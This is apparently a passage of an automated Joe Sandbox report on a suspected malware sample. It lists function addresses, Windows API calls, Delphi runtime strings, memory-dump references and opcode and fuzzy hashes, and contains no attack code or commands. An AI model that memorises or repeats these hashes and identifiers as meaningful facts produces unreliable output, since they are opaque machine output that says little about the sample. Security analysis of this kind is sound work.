                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02887FF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1705453755-0
                                                                            • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                            • Instruction ID: da12fdbbaa71a318048b301a0f59e1fb2e4b646fc08b3bdad765568b3b434eec
                                                                            • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                            • Instruction Fuzzy Hash: 2F11C0B9A00209AFDB04DF99C881DBFF7F9FFC9300B54C569A509E7254E6719A018B91
                                                                            Function 0288A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                            • Instruction ID: 8b10e8153dc769337b70be0debf1c9ffedd48a0bae89053b21b5503d655d93bf
                                                                            • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                            • Instruction Fuzzy Hash: 97E0927E70021817D315B55C9C80EEA729D9B58310F00427AA909C7385FDA09E804AE5
                                                                            Function 0288B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?,028AD106,00000000,028AD11E), ref: 0288B79A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Version
                                                                            • String ID:
                                                                            • API String ID: 1889659487-0
                                                                            • Opcode ID: 11a4a25240d564e6877e9b8a96670d9e9f70a2698dd08b10e3a3c1e23214d97a
                                                                            • Instruction ID: 76a839be875030f854222ca7f760fc42da998650a27819b829501d62c1c18ada
                                                                            • Opcode Fuzzy Hash: 11a4a25240d564e6877e9b8a96670d9e9f70a2698dd08b10e3a3c1e23214d97a
                                                                            • Instruction Fuzzy Hash: C8F0B27C9443429FE350EF28D441A2677E9FB88B14F048D39EA98C7380EB349814CF52
                                                                            Function 0288A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0288BE72,00000000,0288C08B,?,?,00000000,00000000), ref: 0288A823
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                            • Instruction ID: dd506d4e4d53f60e819900837f432769df90f20059711b683edd375380d053a3
                                                                            • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                            • Instruction Fuzzy Hash: 86D05EAE30E2A02AA314A15A2D84E7B5ADCCBC97A1F00403AB988C6141E2008C07DAB1
                                                                            Function 0288920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime
                                                                            • String ID:
                                                                            • API String ID: 481472006-0
                                                                            • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                            • Instruction ID: 13d2adc10819b1d9dcacd84af2c18f0bd3e833ffc5e2c502ac0c402047062beb
                                                                            • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                            • Instruction Fuzzy Hash: 2EA01248404870418540731C0C0253430445C10A20FC4874068F8802D1FA1D11208093
                                                                            Function 0288C95F Relevance: .3, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f3684cc77bf0a9ad2e346a687dae82cc82e2fe3b3514fb91ce25245bce463e1e
                                                                            • Instruction ID: 7d8e2265fc2be6973318de95e7942e0fe9bbd532b455c9647715445617b765ad
                                                                            • Opcode Fuzzy Hash: f3684cc77bf0a9ad2e346a687dae82cc82e2fe3b3514fb91ce25245bce463e1e
                                                                            • Instruction Fuzzy Hash: 28C15E2994E3C85FD313677848F96A93FB18F4720472A99EAC0C4CF5B3C909581BDB66
                                                                            Function 028AE596 Relevance: .2, Instructions: 224COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dcbf099dcd499ecc8eb103b47f0af67ba2d2871f684cf17d401e25ae39527aec
                                                                            • Instruction ID: b5635504b8e76fa83eaa88211ff7b10ab655ef37c6efbe9f45168055c1eefb4f
                                                                            • Opcode Fuzzy Hash: dcbf099dcd499ecc8eb103b47f0af67ba2d2871f684cf17d401e25ae39527aec
                                                                            • Instruction Fuzzy Hash: CD51045941E7C28FD7434F7C98B42A1BFB19D2B12430E19EAC8D4CF563D609589BEB22
                                                                            Function 028820C4 Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                            • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                            • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                            • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                            Function 0288D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0288D29D
                                                                              • Part of subcall function 0288D268: GetProcAddress.KERNEL32(00000000), ref: 0288D281
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                            • API String ID: 1646373207-1918263038
                                                                            • Opcode ID: e785cbbda4c387c6692b7fc5325f9be7eddeb90afeba22408a809920e4b38d60
                                                                            • Instruction ID: 11956f821361f23009a4f014bc9dfaa3ab2f0e384531cf11d28dca09dd77e21d
                                                                            • Opcode Fuzzy Hash: e785cbbda4c387c6692b7fc5325f9be7eddeb90afeba22408a809920e4b38d60
                                                                            • Instruction Fuzzy Hash: FF417F6D98D30D5A52187ABD7440877B7DED648B313A0451BF604CB7C8EAB0FC598B3A
                                                                            Function 02896ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02896EDE
                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02896EEF
                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02896EFF
                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02896F0F
                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02896F1F
                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02896F2F
                                                                            • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02896F3F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                            • API String ID: 667068680-2233174745
                                                                            • Opcode ID: 5d55ddcd808848005fed7b2b8b79882c4aac13393257507d7e8376109c063425
                                                                            • Instruction ID: 1a9e1dc073941345cdceab61da05dee37c8202e58d335281f7ea24daf5204d6f
                                                                            • Opcode Fuzzy Hash: 5d55ddcd808848005fed7b2b8b79882c4aac13393257507d7e8376109c063425
                                                                            • Instruction Fuzzy Hash: 3DF042FCA983F0ADBF50FB745C85926275DAD306443041C25B903D5E83FA796C248F11
                                                                            Function 02882530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028828CE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                            • API String ID: 2030045667-32948583
                                                                            • Opcode ID: 7ab269f23de9e67a25e2fcb119b345cbaaafd6dbdf7384dab4cc256abf257f79
                                                                            • Instruction ID: e97825e280d444e1e3fd466e8d49246a5dc902446dec9981515b17c3c3e16587
                                                                            • Opcode Fuzzy Hash: 7ab269f23de9e67a25e2fcb119b345cbaaafd6dbdf7384dab4cc256abf257f79
                                                                            • Instruction Fuzzy Hash: 64A1043CA042E88FDF21BA2CCC80B99B6E5EB09754F1401E5DD4DEB28ACB759985CF51
                                                                            Function 0288252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02882849
                                                                            • The unexpected small block leaks are:, xrefs: 02882707
                                                                            • , xrefs: 02882814
                                                                            • bytes: , xrefs: 0288275D
                                                                            • 7, xrefs: 028826A1
                                                                            • Unexpected Memory Leak, xrefs: 028828C0
                                                                            • An unexpected memory leak has occurred. , xrefs: 02882690
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                            • API String ID: 0-2723507874
                                                                            • Opcode ID: 043c44473ef34fd4d1937f48d6d6fe8a85850c0187c614e614474a04511ab606
                                                                            • Instruction ID: e70123f424f91eed4932a4e6e13b8b52e01de48816b3e06628a256447b7bf1a5
                                                                            • Opcode Fuzzy Hash: 043c44473ef34fd4d1937f48d6d6fe8a85850c0187c614e614474a04511ab606
                                                                            • Instruction Fuzzy Hash: 0E71C23CA042D88FDF21BA2CCC84B99BAE5EB09754F1001E5D94DDB28ACB754985CF52
                                                                            Function 0289AFE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289B000
                                                                            • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0289B017
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0289B02F
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289B0AB
                                                                            • IsBadReadPtr.KERNEL32(?,00000002), ref: 0289B0B7
                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0289B0CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Read$HandleLibraryLoadModule
                                                                            • String ID: KernelBase$LoadLibraryExA
                                                                            • API String ID: 2872661360-113032527
                                                                            • Opcode ID: f2990bb297d5db9de70eee9daf36983a40f4e0ebb3a6b66469373cece0997804
                                                                            • Instruction ID: cba83e5dca984180b801f576009dcf91d64092fd4aaf6b8d94924218ce5783e3
                                                                            • Opcode Fuzzy Hash: f2990bb297d5db9de70eee9daf36983a40f4e0ebb3a6b66469373cece0997804
                                                                            • Instruction Fuzzy Hash: 2A31637DA40309BBDF20DBA8DC85F5D77A8BF05368F084514EA28EB2C1D330A950CB61
                                                                            Function 0288BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000000,0288C08B,?,?,00000000,00000000), ref: 0288BDF6
                                                                              • Part of subcall function 0288A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 4232894706-2493093252
                                                                            • Opcode ID: 3fcc652cbce3393e90e633b9096a2f85dcf7e8327ebfa8a2990e958695645cca
                                                                            • Instruction ID: bb9e822509518f76f77376ef5b4d725e732d094ed3d10cd154bf43cc60e2b690
                                                                            • Opcode Fuzzy Hash: 3fcc652cbce3393e90e633b9096a2f85dcf7e8327ebfa8a2990e958695645cca
                                                                            • Instruction Fuzzy Hash: 8B61753CB002499BDB08F7A8D89069F77FBDB88300F508436E501DB789DA39D9159F66
                                                                            Function 0288435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?,029067C8,?,?,028AE7A8,028865B1,028AD30D), ref: 02884395
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?,029067C8,?,?,028AE7A8,028865B1,028AD30D), ref: 0288439B
                                                                            • GetStdHandle.KERNEL32(000000F5,028843E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?,029067C8), ref: 028843B0
                                                                            • WriteFile.KERNEL32(00000000,000000F5,028843E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?), ref: 028843B6
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028843D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1570097196-2970929446
                                                                            • Opcode ID: 1232f35799e2e61d41e7d08581943122bbc74a7f3caa06e1f9d8f2ea79a33d8e
                                                                            • Instruction ID: be20680fcabfed44bb3d99841d4362040869e90334d5c55546dd8b9bb258cc7a
                                                                            • Opcode Fuzzy Hash: 1232f35799e2e61d41e7d08581943122bbc74a7f3caa06e1f9d8f2ea79a33d8e
                                                                            • Instruction Fuzzy Hash: 3AF0B46EBC834979FA20B2A87D8AF79275C5748F25F542E15B328E40C5CFA844C58B23
                                                                            Function 0288AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0288AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AD59
                                                                              • Part of subcall function 0288AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AD7D
                                                                              • Part of subcall function 0288AD3C: GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 0288AD98
                                                                              • Part of subcall function 0288AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0288AE2E
                                                                            • CharToOemA.USER32(?,?), ref: 0288AEFB
                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0288AF18
                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288AF1E
                                                                            • GetStdHandle.KERNEL32(000000F4,0288AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288AF33
                                                                            • WriteFile.KERNEL32(00000000,000000F4,0288AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288AF39
                                                                            • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0288AF5B
                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0288AF71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
